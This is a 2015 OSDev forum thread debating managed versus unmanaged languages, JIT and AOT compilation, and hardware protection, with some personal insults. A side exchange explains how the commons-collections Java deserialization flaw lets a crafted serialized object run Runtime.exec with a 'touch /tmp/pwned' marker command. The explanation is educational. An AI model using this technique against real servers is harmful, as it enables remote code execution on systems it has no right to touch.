OSDev.org

The Place to Start for Operating System Developers
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Tue Nov 10, 2015 1:08 pm 

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

embryo2 wrote:
Brendan wrote:
  • Most bugs (e.g. "printf("Hello Qorld\");") can't be detected by a managed environment, compiler or hardware; and therefore good software engineering practices (e.g. unit tests) are necessary

It's compile time detectable problem.


Please explain how it's possible for "bugs that can't be detected by a managed environment, compiler or hardware" to be detected by a compiler.

Surely if any of these bugs could be detected by a compiler; they wouldn't be "bugs that can't be detected by a managed environment, compiler or hardware" in the first place.

embryo2 wrote:
Brendan wrote:
  • Languages and compilers can be designed to detect a lot more bugs during "ahead of time" compiling; and the design of languages like C and C++ prevents compilers for these languages from being good at detecting bugs during "ahead of time" compiling. But this is a characteristic of the languages, not a characteristic imposed by "unmanaged"; and unmanaged languages do exist that are far better (but not necessarily ideal) at detecting/preventing bugs during "ahead of time" compiling (e.g. Rust).

Ahead of time doesn't solve the problem of runtime bugs. And security also can be compromised.


Ahead of time compiling doesn't solve the problem of run-time bugs in isolation; but I was not suggesting that ahead of time compiling should be used in isolation.

embryo2 wrote:
Brendan wrote:
  • Bugs in everything; including "ahead of time" compilers, JIT compilers, kernels and hardware itself; all mean that hardware protection (designed to protect processes from each other, and to protect the kernel from processes) is necessary when security is needed (or necessary for everything, except extremely rare cases like embedded systems and games consoles where software can't modify anything that is persisted and there's no networking)

Hardware protection requires time, power and silicon. Software protection can require less time, power and silicon.


Software protection requires.... hardware that's able to execute software (which requires time, power and silicon).

embryo2 wrote:
Brendan wrote:
  • The combination of good software engineering practices, well designed language and hardware protection means that the benefits of performing additional checks in software at run-time (a managed environment) are near zero even when the run-time checking is both exhaustive and perfect, because everything else detects or would detect the vast majority of bugs anyway.

The proposed combination is too far from achieving the stated goal of "near zero benefits" for runtime checks.


Why (was there a flaw in my reasoning that you haven't mentioned)?

embryo2 wrote:
Brendan wrote:
  • "Exhaustive and perfect" is virtually impossible; which means that the benefits of performing additional checks in software at run-time (a managed environment) is less than "near zero" in practice, and far more likely to be negative (in that the managed environment is more likely to introduce bugs of its own than to find bugs)

It's negative only until smarter compilers are released. It's only a matter of time (and not that much time).


Um, what? If a smart compiler was able to guarantee there are no bugs in the managed environment itself; then a smart compiler could guarantee there's no bugs in normal applications too (which would make a managed environment pointless).

embryo2 wrote:
Brendan wrote:
  • The "near zero or worse" benefits of managed environments do not justify the increased overhead caused by performing additional checks in software at run-time

Safeness and security justify the increase.


Zero additional safety and zero additional security doesn't even justify a lollipop.

embryo2 wrote:
Brendan wrote:
  • Where performance is irrelevant (specifically, during testing done before software is released) managed environments may be beneficial; but this never applies to released software.

It applies to released software too, because the issues of safety and security are still important.


No; if you release software that has safety and security problems then you've already failed; and you should probably get a job as a web developer instead of working on useful software (so that people know you qualify when they're preparing that amazing vacation to the centre of the sun).

embryo2 wrote:
Brendan wrote:
  • Languages that are restricted for the purpose of allowing additional checks in software at run-time to be performed ("managed languages"); including things like not allowing raw pointers, not allowing assembly language, not allowing explicit memory management, not allowing self modifying code and/or not allowing dynamic code generation; prevent software from being as efficient as possible

If efficiency is of paramount importance, we can buy trusted sources of efficient software; and because of the nature of trust, we can safely tell the managed environment to compile the code without safety checks, paying attention to the developer's performance-related annotations. Next, it runs the code under hardware protection. And then, after we have tested some software usage patterns, we can safely remove even the hardware protection for every tested pattern and obtain even better performance.


Basically; in an ill-fated attempt at showing that "managed" isn't a pathetic joke, you suggest using "unmanaged" as an alternative?

embryo2 wrote:
Brendan wrote:
  • Software written in a managed language but executed in an unmanaged language (without the overhead of run-time checking) is also prevented from being as efficient as possible by the restrictions imposed by the managed language

Restrictions can be circumvented by the means described above.


Security measures can be circumvented by the means described above? Nice... :roll:

embryo2 wrote:
Brendan wrote:
  • General purpose code can not be designed for a specific purpose by definition; and therefore can not be optimal for any specific purpose. This affects libraries for both managed languages and unmanaged languages alike.

Is the integer addition (x+y) operation a general purpose one? Is it implemented inefficiently in the case of JIT?


How many libraries does Java provide to do integer addition (x+y)? Are there more than 4 of these libraries?

embryo2 wrote:
Brendan wrote:
  • Large libraries and/or frameworks improve development time by sacrificing the quality of the end product (because general purpose code can not be designed for a specific purpose by definition).

Here is the place for aggressive inlining and other similar techniques. But the code should be in a compatible form, like bytecode.


I'm not talking about trivial/common optimisations that all compilers do anyway; I'm talking about things like (e.g.) choosing insertion sort because you know that for your specific case the data is always "nearly sorted" beforehand (and not just using a generic quicksort that's worse for your special case just because that's what a general purpose library happened to shove in your face).
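To make the special-case point concrete, here is a minimal Java sketch (the class and method names are illustrative only). Insertion sort does work proportional to the number of out-of-place elements, so on "nearly sorted" input it approaches linear time, where a generic quicksort still pays its full O(n log n) cost:

Code:
public class NearlySorted {
    static void insertionSort(int[] a) {
        for (int i = 1; i < a.length; i++) {
            int key = a[i];
            int j = i - 1;
            // Shift larger elements right. On nearly-sorted data this inner
            // loop body rarely runs, so the whole sort is close to linear time.
            while (j >= 0 && a[j] > key) {
                a[j + 1] = a[j];
                j--;
            }
            a[j + 1] = key;
        }
    }

    public static void main(String[] args) {
        int[] a = { 1, 2, 4, 3, 5, 6, 8, 7 }; // "nearly sorted" input
        insertionSort(a);
        System.out.println(java.util.Arrays.toString(a));
    }
}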

embryo2 wrote:
Brendan wrote:
  • For most (not all) things that libraries are used for; for both managed and unmanaged languages the programmer has the option of ignoring the library's general purpose code and writing code specifically for their specific case. For managed languages libraries are often native code (to avoid the overhead of "managed", which is likely the reason managed languages tend to come with massive libraries/frameworks) and if a programmer chooses to write the code themselves they begin with a huge disadvantage (they can't avoid the overhead of "managed" like the library did) and their special purpose code will probably never beat the general purpose native code. For an unmanaged language the programmer can choose to write the code themselves (and avoid sacrificing performance for the sake of developer time) without that huge disadvantage.

If performance is important, and the environment's compiler is still too weak, and there's some mechanism of trust between a developer and a user, then the developer is perfectly free to implement any possible optimization tricks.


I'm glad that you agree that "managed" is useless and we should all use "unmanaged" (and the optimisation tricks it makes possible) for anything important.

embryo2 wrote:
Brendan wrote:
  • To achieve optimal performance and reduce "programmer error"; a programmer has to know what effect their code actually has at the lowest levels (e.g. what their code actually asks the CPU/s to do). Higher level languages make it harder for programmers to know what effect their code has at the lowest levels; and are therefore a barrier preventing both performance and correctness. This applies to managed and unmanaged languages alike. Note: as a general rule of thumb; if you're not able to accurately estimate "cache lines touched" without compiling, executing or profiling; then you're not adequately aware of what your code does at the lower levels.

If a developer faces some bottleneck and it's important, then he usually digs deep enough to find the root cause. So all your "harder for programmers to know" applies to beginners only.


If a developer faces some bottleneck and it's important, then he usually digs deep enough to find that root cause is "managed".

embryo2 wrote:
Brendan wrote:
  • The fact that higher level languages are a barrier preventing both performance and correctness is only partially mitigated through the use of highly tuned ("optimised for no specific case") libraries.

Optimized libraries aren't the only way. The developer experience is a much preferable solution.


I don't know if you mean "the developer's experience level" (e.g. how skilled they are) or "the developer experience" (e.g. whether they have nice tools/IDE, pair of good/large monitors and a comfortable chair); and for both of these possibilities I don't know how it helps them understand things that higher level languages are deliberately designed to abstract.

embryo2 wrote:
Brendan wrote:
  • Portability is almost always desirable

So, just use bytecode.
Brendan wrote:
  • Source code portability (traditionally used by languages like C and C++) causes copyright concerns for anything not intended as open source, which makes it a "less preferable" way to achieve portability for a large number of developers. To work around this developers of "not open source" software provide pre-compiled native executables. Pre-compiled native executables can't be optimised specifically for the end user's hardware/CPUs unless the developer provides thousands of versions of the pre-compiled native executables, which is extremely impractical. The end result is that users end up with poorly optimised software.

Copyright concerns can be avoided using downloadable software. Just select your platform and get the best performance. But the trust should exist there. So any copyright holder can now exploit users' inability to protect themselves; but in the case of managed, the environment takes care of using hardware protection, or even emulates the hardware to detect potential threats.


I have 2 computers and both are 64-bit 80x86.

One has 2.8 GHz CPUs with 1300 MHz RAM and for this combination the ideal prefetch scheduling distance is 160 cycles. The other has 3.5 GHz CPUs with 1600 MHz RAM and for this combination the ideal prefetch scheduling distance is 200 cycles. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance?

One has 2 physical chips (and NUMA) with 4 cores per chip and hyperthreading (16 logical CPUs total) and 12 GiB of RAM (6 GiB per NUMA domain). The other has a single physical quad-core chip (8 logical CPUs total) and 32 GiB of RAM without NUMA. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance and the differences in memory subsystems, number of NUMA domains, chips, cores, etc?

One supports AVX2.0 and the other doesn't support AVX at all. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance, and the differences in memory subsystems (and number of NUMA domains, chips, cores, etc), and which SIMD extensions are/aren't supported?

embryo2 wrote:
Brendan wrote:
  • Various optimisations are expensive (e.g. even for fundamental things like register allocation finding the ideal solution is prohibitively expensive); and JIT compiling leads to a run-time compromise between the expense of performing the optimisation and the benefits of performing the optimisation. An ahead of time compiler has no such compromise and therefore can use much more expensive optimisations and can optimise better (especially if it's able to optimise for the specific hardware/CPUs).

There's no compromise. The environment can decide when to use JIT or AOT.


Sure - while the software is running and being JIT compiled, the environment decides "Oh, I should use AOT for this next part", travels backwards in time until 5 minutes before the software started running, does ahead of time compiling, then travels forward in time and switches to AOT. I have no idea why this hasn't been implemented before! :roll:

embryo2 wrote:
Brendan wrote:
  • There are massive problems with the tool-chains for popular unmanaged languages (e.g. C and C++) that prevent effective optimisation (specifically; splitting a program into object files and optimising them in isolation prevents a huge number of opportunities, and trying to optimise at link time after important information has been discarded also prevents a huge number of opportunities). Note that this is a restriction of typical tools, not a restriction of the languages or environments.

Well, yes, we need to get rid of unmanaged :)


We need to get rid of C and C++ because they make unmanaged seem far worse than it should (for multiple reasons).

embryo2 wrote:
Brendan wrote:
  • Popular JIT compiled languages are typically able to get close to the performance of popular "compiled to native" unmanaged languages because these "compiled to native" unmanaged languages have both the "not optimised specifically for the specific hardware/CPUs" problem and the "effective optimisation prevented by the tool-chain" problem.

So, the unmanaged sucks despite all your claims above.


Most existing unmanaged languages suck, but their problems have nothing to do with "unmanaged" and are relatively easy to fix or avoid. Most managed languages also suck, but their problems have everything to do with "managed" and can't be fixed or avoided.

embryo2 wrote:
Brendan wrote:
  • "Ahead of time" compiling from byte-code to native on the end user's machine (e.g. when the end user installs software) provides portability without causing the performance problems of JIT and without causing the performance problems that popular unmanaged languages have.

AOT is an important part of the managed environment.


AOT may or may not be an important part of a managed environment; but this has nothing to do with using 2 AOT compilers (one before software is deployed and the other after/while software is installed by the end user) to solve portability and performance/optimisation and copyright problems in traditional unmanaged toolchains.

embryo2 wrote:
Brendan wrote:
In other words; the best solution is an unmanaged language that is designed to detect as many bugs as possible during "source to byte code" compiling that does not prevent "unsafe" things (if needed), combined with an ahead of time "byte code to native" compiler on the end user's computer; where the resulting native code is executed in an unmanaged environment with hardware protection.

The best solution is a managed environment with many options available, including JIT, AOT, hardware-protected sessions and, of course, the best ever smart compiler.


Can you back this up with logical reasoning?


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:04 am 

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Brendan wrote:
embryo2 wrote:
Brendan wrote:
Airbags exists to protect against user error, not to protect against design flaws.

Is the car's speed a design flaw?


It's a design requirement - a car that doesn't move is an ornament and not a car at all.

It means we have to protect users from speed-related accidents. So the protection is implemented in the form of an airbag. And it isn't about user errors; it's about the user's inability to predict the future.
Brendan wrote:
It's extremely difficult for people to reason about software if/when it's doing many things simultaneously; and so all CPUs (including Intel's and everyone else's) have to emulate "one step at a time" so that they're usable (even if they don't actually do "one step at a time" internally).

Compilers split code into independent parts. And humans write the code sequentially. No problem here. Intel's processors just add a hardware-based compiler for human-readable assembly. But a hardware-based compiler is obvious trash, because it lacks the memory and time available to a software compiler.
Brendan wrote:
embryo2 wrote:
Brendan wrote:
In my case, the kernel provides exception handlers to handle it (e.g. by adding info to a log and terminating the process) and there's no additional bloat in the process itself to explictly handle problems that shouldn't happen.

It doesn't prevent the process from having the implicit handling of "additional bloat". Do you know how electronic gates work? Can you show a magical schematic with the ability to skip a bit-value check, or to set input levels according to the variable's value in memory?


If an exception (e.g. page fault) occurs and the kernel responds by terminating the process immediately; no stupid bloat for handling this condition (or any similar condition) is possible in any process at all.

I don't see how the remainder of your reply (gates? schematics?) relates to what it's replying to.

For the processor to know that anything has happened, it must execute an operation which detects the interesting part of the processor's state. So the "additional bloat" here is the detection part of the processor's work. It simply must be done, regardless of anything else. It's unavoidable. And your point is that this part of the work should always be implemented in hardware. My point is that it's a bad idea to hardcode an algorithm in hardware, because it's too inflexible.
Brendan wrote:
I very much doubt that we're using the same definition of competence. For things like smartphone app development and web development (which is far worse) the inherent inefficiency means that a person must be willing to sacrifice the quality of the end product for the sake of "rapid turd shovelling". This sacrifice is only possible for people who have a severe lack of pride in their work or are unable to recognise the inefficiencies; and lack of pride in your work and/or an inability to recognise and avoid inefficiency is how I define incompetence.

The efficiency here is measured in terms of "time to market", not in terms of "after a year we finally managed to save 1% of the processor's time".
Brendan wrote:
Fortunately bloatware only runs the small part of the planet that (I assume) you're permanently stuck in.

The Internet is run by Java, at best. At worst, it's run by different forms of scripts like PHP, or something even uglier. And only a very small part of the Internet is run by things like the Apache HTTP server.
Brendan wrote:
Heh - a web server is "OS level code" now?!?

Deep optimization has always been OS-level work.
Brendan wrote:
I only saw this list of benchmark results. There isn't a single 80x86 benchmark at all!

Yes. And do you still think your claim about the underperformance of ARM-based 64-bit solutions is supported by any sane benchmark?
Brendan wrote:
You deliberately chose a "PC only" benchmark; and shouldn't be surprised that you get benchmark results for PCs. You also deliberately chose to ignore the benchmarks that the industry uses (like SPECint and SPEC2006) that I mentioned.

Well, I glanced at this page. And what? A few SPARC processors drowned among thousands of Intel-compatible chips. There's no ARM. And your claim about ARM's underperformance is still in question.

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:09 am 

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
You don't have to read the entire page from start to finish. You can skip to the parts that describe the exploit (and the links where the exploit is described in further detail).

If I skip these parts then I will be unable to understand how it works.
Octocontrabass wrote:
All of the classes used in the exploit are part of the application being exploited. More specifically, they are all part of commons-collections, which is a component of all of the exploited applications. The remote attacker needs no access to the server's filesystem, because the vulnerable code is already there.

You can download the commons-collections sources from here. Next you can grep the archive for "touch /tmp/pwned". And after you find there's no such code, it would be interesting to hear from you where the JVM can get it from.

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:19 am 

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Schol-R-LEA wrote:
embryo2 wrote:
Brendan wrote:
Most bugs (e.g. "printf("Hello Qorld\");") can't be detected by a managed environment, compiler or hardware; and therefore good software engineering practices (e.g. unit tests) are necessary

It's compile time detectable problem.

Wait a moment, are you claiming that the compiler (as opposed to the editor or IDE) should not only incorporate a spell checker for strings, but also be able to detect a spelling error in a string (e.g., "Qorld" instead of "World")?

There's an escaped quotation mark, which makes the string literal endless.

Maybe Brendan was kidding, giving us doubly-troubled code. Or maybe Brendan accidentally made this compiler-detectable bug (despite his claims of being a very careful developer).
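A minimal illustration of the two separate bugs in that snippet (shown here in Java, where string escapes behave the same way; the class name is illustrative):

Code:
public class Escapes {
    public static void main(String[] args) {
        System.out.println("Hello Qorld");   // semantic typo: compiles and runs fine,
                                             // so no compiler or managed runtime flags it
        // System.out.println("Hello Qorld\");
        // ^ uncommented, this is a compile-time error: the \" escapes the
        //   closing quote, so the string literal never terminates
    }
}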
Schol-R-LEA wrote:
To be fair, I suspect the Embryo simply chose the page as being the first one found in a Google search on the phrase 'CPU benchmark', without looking critically at what was actually presented or understanding the nuances of benchmarking

Yes. I had no intention of making a thorough examination of many Internet pages just because a tiny percentage of them might prove Brendan's point of view. I see what an ordinary user sees - there's no sane comparison between Intel and ARM processors.

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:48 am 

Joined: Mon Mar 25, 2013 7:01 pm
Posts: 5137
embryo2 wrote:
If I skip these parts then I will be unable to understand how it works.

The authors give a more thorough explanation than I can.

embryo2 wrote:
You can download the commons-collections sources from here. Next you can grep the archive for "touch /tmp/pwned". And after you will find there's no such code it is interesting to hear from you where from the JVM can get it?

The JVM receives the malicious code from the remote attacker, embedded in a serialized object. The serialized object is crafted to exploit a vulnerability in commons-collections that allows it to execute arbitrary code.
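In code terms the entry point is tiny; a hedged sketch, assuming a socket-based service (class and method names are illustrative):

Code:
import java.io.ObjectInputStream;
import java.net.Socket;

public class Endpoint {
    static Object readUntrusted(Socket socket) throws Exception {
        ObjectInputStream in = new ObjectInputStream(socket.getInputStream());
        // The incoming bytes merely *name* classes; the JVM resolves those names
        // against the application's own classpath (which ships commons-collections)
        // and runs their deserialization logic before this call returns.
        return in.readObject();
    }
}

The attacker uploads no code; the malicious stream only names and parameterises classes the server already has.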


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 4:56 am 

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Brendan wrote:
Ahead of time compiling doesn't solve the problem of run-time bugs in isolation; but I was not suggesting that ahead of time compiling should be used in isolation.

Yes, it should be used in conjunction with a managed environment.
Brendan wrote:
Software protection requires.... hardware that's able to execute software (which requires time, power and silicon).

Yes, just like hardware protection requires hardware that's able to execute software (which requires time, power and silicon).
Brendan wrote:
embryo2 wrote:
Brendan wrote:
  • The combination of good software engineering practices, well designed language and hardware protection means that the benefits of performing additional checks in software at run-time (a managed environment) are near zero even when the run-time checking is both exhaustive and perfect, because everything else detects or would detect the vast majority of bugs anyway.

The proposed combination is too far from achieving the stated goal of "near zero benefits" for runtime checks.


Why (was there a flaw in my reasoning that you haven't mentioned)?

The flaw can be described as "$hit happens". The compiler is unable to detect all bugs. Extensive testing is unable to detect all bugs. Good software design methodology is unable to prevent all bugs. And so on. Systems are really complex, and the complexity prevents us from finding a simple way of developing bug-free software; that's why we check results at run time and increase the software's reliability. Yes, it adds some redundancy, but it solves the problem. A car can run without an airbag, but people prefer to have one (at least), even if it turns out to be useless for the car's whole lifetime.
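As a minimal sketch of the kind of run-time check being defended here (plain Java, nothing beyond the standard library):

Code:
public class BoundsCheck {
    public static void main(String[] args) {
        int[] a = new int[4];
        // The JVM validates every index at run time: a[4] cannot silently
        // corrupt memory; it throws ArrayIndexOutOfBoundsException instead,
        // which can be caught and logged. This compiles without complaint.
        System.out.println(a[4]);
    }
}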
Brendan wrote:
embryo2 wrote:
Brendan wrote:
  • "Exhaustive and perfect" is virtually impossible; which means that the benefits of performing additional checks in software at run-time (a managed environment) is less than "near zero" in practice, and far more likely to be negative (in that the managed environment is more likely to introduce bugs of its own than to find bugs)

It's negative only until smarter compilers are released. It's only a matter of time (and not that much time).


Um, what? If a smart compiler was able to guarantee there are no bugs in the managed environment itself; then a smart compiler could guarantee there's no bugs in normal applications too (which would make a managed environment pointless).

Read carefully - it's about negative benefits.
Brendan wrote:
if you release software that has safety and security problems then you've already failed;

OK, I failed. But haven't you too? Who on earth writes no bugs? Or who on earth spends a lifetime delivering some small but bug-free solution?
Brendan wrote:
and you should probably get a job as a web developer instead of working on useful software (so that people know you qualify when they're preparing that amazing vacation to the centre of the sun).

Yes, people pay for my vacations because I qualify as productive.
Brendan wrote:
embryo2 wrote:
Brendan wrote:
  • Software written in a managed language but executed in an unmanaged language (without the overhead of run-time checking) is also prevented from being as efficient as possible by the restrictions imposed by the managed language

Restrictions can be circumvented by the means described above.


Security measures can be circumvented by the means described above? Nice... :roll:

No, it's about restrictions imposed by the managed language, read it carefully, please.
Brendan wrote:
How many libraries does Java provide to do integer addition (x+y)? Are there more than 4 of these libraries?

There's just one JVM, which translates the x+y into a form of the "add" instruction.
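For reference, a two-int addition compiles to a single bytecode, which a JIT or AOT backend then lowers to the machine's add instruction; a sketch, with approximate javap -c output in the comments:

Code:
public class Add {
    static int add(int x, int y) {
        return x + y;
    }
    // javap -c Add, approximately:
    //   iload_0   // push x
    //   iload_1   // push y
    //   iadd      // the single "add" bytecode a JIT maps to a hardware add
    //   ireturn
}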
Brendan wrote:
I'm talking about things like (e.g.) choosing insertion sort because you know that for your specific case the data is always "nearly sorted" beforehand (and not just using a generic quicksort that's worse for your special case just because that's what a general purpose library happened to shove in your face).

Algorithm selection is not easy. But compilers are already able to select some algorithms. In the future the selection set can be extended greatly.
Brendan wrote:
I don't know if you mean "the developer's experience level" (e.g. how skilled they are) or "the developer experience" (e.g. whether they have nice tools/IDE, pair of good/large monitors and a comfortable chair);

Maybe the latter can be designated as "the development experience"? But anyway, the addition of "level" really helps.
Brendan wrote:
and for both of these possibilities I don't know how it helps them understand things that higher level languages are deliberately designed to abstract.

Yes, they are designed. But the human being was designed to understand his tools.
Brendan wrote:
I have 2 computers and both are 64-bit 80x86.

One has 2.8 GHz CPUs with 1300 MHz RAM and for this combination the ideal prefetch scheduling distance is 160 cycles. The other has 3.5 GHz CPUs with 1600 MHz RAM and for this combination the ideal prefetch scheduling distance is 200 cycles. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance?

One has 2 physical chips (and NUMA) with 4 cores per chip and hyperthreading (16 logical CPUs total) and 12 GiB of RAM (6 GiB per NUMA domain). The other has a single physical quad-core chip (8 logical CPUs total) and 32 GiB of RAM without NUMA. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance and the differences in memory subsystems, number of NUMA domains, chips, cores, etc?

One supports AVX2.0 and the other doesn't support AVX at all. Where do I download pre-compiled software that was optimised for each computer's prefetch scheduling distance, and the differences in memory subsystems (and number of NUMA domains, chips, cores, etc), and which SIMD extensions are/aren't supported?

Do you think it would be an unsolvable problem for you to decide how to ask a user about his hardware?
Brendan wrote:
AOT may or may not be an important part of a managed environment; but this has nothing to do with using 2 AOT compilers (one before software is deployed and the other after/while software is installed by the end user) to solve portability and performance/optimisation and copyright problems in traditional unmanaged toolchains.

You introduce useless entities. It was shown how one AOT compiler can help; your second AOT compiler is useless.
Brendan wrote:
embryo2 wrote:
The best solution is a managed environment with many options available, including JIT, AOT, hardware-protected sessions and, of course, the best ever smart compiler.


Can you back this up with logical reasoning?

Every option has advantages. If we can use an advantage, we can do our work better. So it's obvious that it's better to have the options that allow us to have advantages. And it's better to have a bag (the environment) for all these options, because it's very impractical to work with every option separately.

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 5:08 am 

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
The JVM receives the malicious code from the remote attacker, embedded in a serialized object. The serialized object is crafted to exploit a vulnerability in commons-collections that allows it to execute arbitrary code.

Well, now you have jumped to the "second option" from the option set of only one option :)

The JVM receives just a class name and its data (field values). Next, the JVM looks up the class by its name. Next, the JVM instantiates the class. Next, the JVM passes the class to the generic deserializer. Next, the deserializer uses the class definition to tell the JVM what method to run. Have you noticed the need for the class? Where can the JVM get it from? Have you noticed there's no place for the object's data yet? It's irrelevant what the payload has, except the class name.

Well, maybe it's a good idea to ask the article's author how he managed not to notice such an important problem as file system access.

But in fact the author mumbles a bit about "if it's not this way then it's impossible". However, everyone here just missed that mumbling (me included; my first reading missed these words). So - it's just obfuscated trash.

_________________
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 5:31 am 

Joined: Mon Mar 25, 2013 7:01 pm
Posts: 5137
embryo2 wrote:
The JVM receives just a class name and its data (field values). Next, the JVM looks up the class by its name. Next, the JVM instantiates the class. Next, the JVM passes the class to the generic deserializer. Next, the deserializer uses the class definition to tell the JVM what method to run. Have you noticed the need for the class? Where can the JVM get it from? Have you noticed there's no place for the object's data yet? It's irrelevant what the payload has, except the class name.

The payload relies on the fact that the object being unserialized can specify methods to invoke, due to a vulnerability in commons-collections. One of the methods it invokes is Runtime.exec("touch /tmp/pwned").

embryo2 wrote:
Well, maybe it's a good idea to ask the article's author how he managed not to notice such an important problem as file system access.

Good idea. I'm sure the author can explain the vulnerability much better than I can.

embryo2 wrote:
But in fact the author mumbles a bit about "if it's not this way then it's impossible".

Can you specify exactly where the author states this?


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Wed Nov 11, 2015 8:57 am 

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

embryo2 wrote:
Brendan wrote:
Ahead of time compiling doesn't solve the problem of run-time bugs in isolation; but I was not suggesting that ahead of time compiling should be used in isolation.

Yes, it should be used in conjunction with a managed environment.


Why would anyone be stupid enough to use a managed environment to reduce performance and increase the risk of bugs and security problems?

embryo2 wrote:
Brendan wrote:
Software protection requires.... hardware that's able to execute software (which requires time, power and silicon).

Yes, just like hardware protection requires hardware that's able to execute software (which requires time, power and silicon).


Erm. In case you missed my point: using software (that requires hardware) in an attempt to avoid using hardware is completely idiotic, because you're not avoiding the use of hardware at all (and are using even more hardware, and making the problem you're trying to prevent even worse).

It's like a doctor telling a morbidly obese patient that they have to stop eating a few pieces of bacon for breakfast because there's too many calories (which are bad) and they should eat 20 large bowls of caramel ice-cream (with extra chocolate topping) per day instead.

embryo2 wrote:
Brendan wrote:
Why (was there a flaw in my reasoning that you haven't mentioned)?

The flaw can be described as "$hit happens". The compiler is unable to detect all bugs. Extensive testing is unable to detect all bugs. Good software design methodology is unable to prevent all bugs. And so on. Systems are really complex, and the complexity prevents us from finding a simple way of developing bug-free software; that's why we check results at run time and increase the software's reliability. Yes, it adds some redundancy, but it solves the problem. A car can run without an airbag, but people prefer to have one (at least), even if it turns out to be useless for the car's whole lifetime.


Here's an idea: Because "$hit happens", let's use a random number generator to trash an executable's code when each process is started! It won't help (just like "managed environment" won't help) and it will make everything worse (just like "managed environment" makes everything worse), but at least we can pretend we tried!

embryo2 wrote:
Brendan wrote:
embryo2 wrote:
It's negative only until smarter compilers are released. It's only a matter of time (and not that much time).


Um, what? If a smart compiler was able to guarantee there are no bugs in the managed environment itself; then a smart compiler could guarantee there's no bugs in normal applications too (which would make a managed environment pointless).

Read carefully - it's about negative benefits.


Erm, OK, I've read carefully now...

If a smart compiler was able to guarantee there are no "negative benefits" in the managed environment itself; then a smart compiler could guarantee there's no "negative benefits" in normal applications too (which would make a managed environment pointless).

embryo2 wrote:
Brendan wrote:
if you release software that has safety and security problems then you've already failed;

OK, I failed. But haven't you too? Who on earth writes no bugs? Or who on earth spends a lifetime delivering some small but bug-free solution?


As I've explained repeatedly over the course of about 6 months in multiple topics; yes there will be bugs; but no, a managed environment does nothing at all to help and is incredibly pointless and stupid (primarily because there are far better and more effective ways of finding and mitigating the bugs, and these better/more effective ways are all necessary anyway).

Please note that your failure to learn anything (and/or your constant failure to propose any rational explanation for your stupidity) indicates that you will remain incompetent and ignorant until the day you die; and that talking to you is most likely a complete and utter waste of my time. You simply lack the intelligence necessary to justify your uninformed and misled opinion; so you resort to repeating the same flawed assumptions while ignoring all common sense.

embryo2 wrote:
Brendan wrote:
  • Software written in a managed language but executed in an unmanaged language (without the overhead of run-time checking) is also prevented from being as efficient as possible by the restrictions imposed by the managed language

embryo2 wrote:
Restrictions can be circumvented by the means described above.

Brendan wrote:
Security measures can be circumvented by the means described above? Nice... :roll:

No, it's about restrictions imposed by the managed language, read it carefully, please.


You can't avoid the restrictions without also avoiding the security measures; so neither can be avoided unless both are avoided.

Note that I am not disagreeing with you here. Because managed languages serve no useful purpose, I do agree that both the restrictions they cause and the security measures they fail to provide can be discarded without consequence.

embryo2 wrote:
Brendan wrote:
    General purpose code can not be designed for a specific purpose by definition; and therefore can not be optimal for any specific purpose. This affects libraries for both managed languages and unmanaged languages alike.

Is the integer addition (x+y) operation a general purpose one? Is it implemented inefficiently in the case of JIT?
Brendan wrote:
How many libraries does Java provide to do integer addition (x+y)? Are there more than 4 of these libraries?

There's just one JVM, which translates the x+y into a form of the "add" instruction.


So you're saying that your (x+y) has nothing at all to do with libraries, and therefore has nothing to do with general purpose code provided by libraries being "less optimal" for a specific purposes?

embryo2 wrote:
Brendan wrote:
I'm talking about things like (e.g.) choosing insertion sort because you know that for your specific case the data is always "nearly sorted" beforehand (and not just using a generic quicksort that's worse for your special case just because that's what a general purpose library happened to shove in your face).

Algorithm selection is not easy. But compilers are already able to select some algorithms. In the future the selection set can be extended greatly.


In your magic pipe-dream future; all programmers will spend all their time adding to the libraries and maintaining them, just so people who aren't programmers can do things like (e.g.) "#include <web_browser>" whenever they want to pretend they wrote a new web browser.

embryo2 wrote:
Brendan wrote:
I don't know if you mean "the developer's experience level" (e.g. how skilled they are) or "the developer experience" (e.g. whether they have nice tools/IDE, pair of good/large monitors and a comfortable chair);

Maybe the latter can be designated as "the development experience"? But anyway, the addition of "level" really helps.
Brendan wrote:
and for both of these possibilities I don't know how it helps them understand things that higher level languages are deliberately designed to abstract.

Yes, they are designed. But the human being was designed to understand his tools.


